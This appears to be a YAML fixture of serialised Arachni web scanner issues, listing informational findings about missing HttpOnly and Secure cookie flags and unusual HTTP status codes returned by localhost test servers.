mod_name: HttpOnly cookies variations: - !ruby/object:Arachni::Issue verification: false references: HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly opts: :var: !binary |- Y29va2ll :element: cookie :regexp: '' var: cookie url: http://localhost:14530/ injected: id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": - !binary |- Y29va2llPXZhbHVl - !binary |- Y29va2llMj12YWx1ZTI= - !binary |- Y29va2llMz12YWx1ZTM7IEh0dHBPbmx5 - !binary |- Y29va2llND12YWx1ZTQ7IEh0dHBPbmx5 name: HttpOnly cookie description: ! "The logged cookie does not have the HttpOnly\n flag set which makes it susceptible to manipulation via client-side code." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'HttpOnly' flag in the cookie. mod_name: HttpOnly cookies variations: [] internal_modname: HttpOnlyCookies internal_modname: HttpOnlyCookies - !ruby/object:Arachni::Issue verification: false references: HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly var: cookie2 url: http://localhost:14530/ elem: cookie method: GET name: HttpOnly cookie description: ! 
"The logged cookie does not have the HttpOnly\n flag set which makes it susceptible to manipulation via client-side code." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'HttpOnly' flag in the cookie. mod_name: HttpOnly cookies variations: - !ruby/object:Arachni::Issue verification: false references: HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly opts: :var: !binary |- Y29va2llMg== :element: cookie :regexp: '' var: cookie2 url: http://localhost:14530/ injected: id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": - !binary |- Y29va2llPXZhbHVl - !binary |- Y29va2llMj12YWx1ZTI= - !binary |- Y29va2llMz12YWx1ZTM7IEh0dHBPbmx5 - !binary |- Y29va2llND12YWx1ZTQ7IEh0dHBPbmx5 name: HttpOnly cookie description: ! "The logged cookie does not have the HttpOnly\n flag set which makes it susceptible to manipulation via client-side code." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'HttpOnly' flag in the cookie. 
mod_name: HttpOnly cookies variations: [] internal_modname: HttpOnlyCookies internal_modname: HttpOnlyCookies - !ruby/object:Arachni::Issue verification: false references: SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag var: cookie url: http://localhost:11400/ elem: cookie method: GET name: Insecure cookie description: ! "The logged cookie is allowed to be served over\n an unencrypted channel which makes it susceptible to sniffing." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'Secure' flag in the cookie. mod_name: Insecure cookies variations: - !ruby/object:Arachni::Issue verification: false references: SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag opts: :var: !binary |- Y29va2ll :element: cookie :regexp: '' var: cookie url: http://localhost:11400/ injected: id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": - !binary |- Y29va2llPXZhbHVl - !binary |- Y29va2llMj12YWx1ZTI= - !binary |- Y29va2llMz12YWx1ZTM7IHNlY3VyZQ== - !binary |- Y29va2llND12YWx1ZTQ7IHNlY3VyZQ== name: Insecure cookie description: ! 
"The logged cookie is allowed to be served over\n an unencrypted channel which makes it susceptible to sniffing." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'Secure' flag in the cookie. mod_name: Insecure cookies variations: [] internal_modname: InsecureCookies internal_modname: InsecureCookies - !ruby/object:Arachni::Issue verification: false references: SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag var: cookie2 url: http://localhost:11400/ elem: cookie method: GET name: Insecure cookie description: ! "The logged cookie is allowed to be served over\n an unencrypted channel which makes it susceptible to sniffing." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'Secure' flag in the cookie. mod_name: Insecure cookies variations: - !ruby/object:Arachni::Issue verification: false references: SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag opts: :var: !binary |- Y29va2llMg== :element: cookie :regexp: '' var: cookie2 url: http://localhost:11400/ injected: id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": - !binary |- 
Y29va2llPXZhbHVl - !binary |- Y29va2llMj12YWx1ZTI= - !binary |- Y29va2llMz12YWx1ZTM7IHNlY3VyZQ== - !binary |- Y29va2llND12YWx1ZTQ7IHNlY3VyZQ== name: Insecure cookie description: ! "The logged cookie is allowed to be served over\n an unencrypted channel which makes it susceptible to sniffing." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'Secure' flag in the cookie. mod_name: Insecure cookies variations: [] internal_modname: InsecureCookies internal_modname: InsecureCookies - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/201 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 201' :element: server :regexp: '' var: url: http://localhost:10473/201 injected: id: ! 'Code: 201' regexp: '' regexp_match: elem: server remarks: :stuff: - Blah - Blah2 method: GET response: '2017960' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 
'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/206 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 206' :element: server :regexp: '' var: url: http://localhost:10473/206 injected: id: ! 'Code: 206' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '2067257' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/207 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 207' :element: server :regexp: '' var: url: http://localhost:10473/207 injected: id: ! 'Code: 207' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '2073403' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/202 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 202' :element: server :regexp: '' var: url: http://localhost:10473/202 injected: id: ! 'Code: 202' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '2024871' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/208 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 208' :element: server :regexp: '' var: url: http://localhost:10473/208 injected: id: ! 'Code: 208' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '2089330' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/203 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 203' :element: server :regexp: '' var: url: http://localhost:10473/203 injected: id: ! 'Code: 203' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '2035153' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/403 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 403' :element: server :regexp: '' var: url: http://localhost:10473/403 injected: id: ! 'Code: 403' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4037226' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/226 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 226' :element: server :regexp: '' var: url: http://localhost:10473/226 injected: id: ! 'Code: 226' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '2264648' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/300 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 300' :element: server :regexp: '' var: url: http://localhost:10473/300 injected: id: ! 'Code: 300' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '3003455' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/405 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 405' :element: server :regexp: '' var: url: http://localhost:10473/405 injected: id: ! 'Code: 405' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4056256' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/407 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 407' :element: server :regexp: '' var: url: http://localhost:10473/407 injected: id: ! 'Code: 407' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4077160' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/406 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 406' :element: server :regexp: '' var: url: http://localhost:10473/406 injected: id: ! 'Code: 406' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4063228' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: true references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/408 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: true references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 408' :element: server :regexp: '' var: url: http://localhost:10473/408 injected: id: ! 'Code: 408' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4083910' headers: request: Accept: 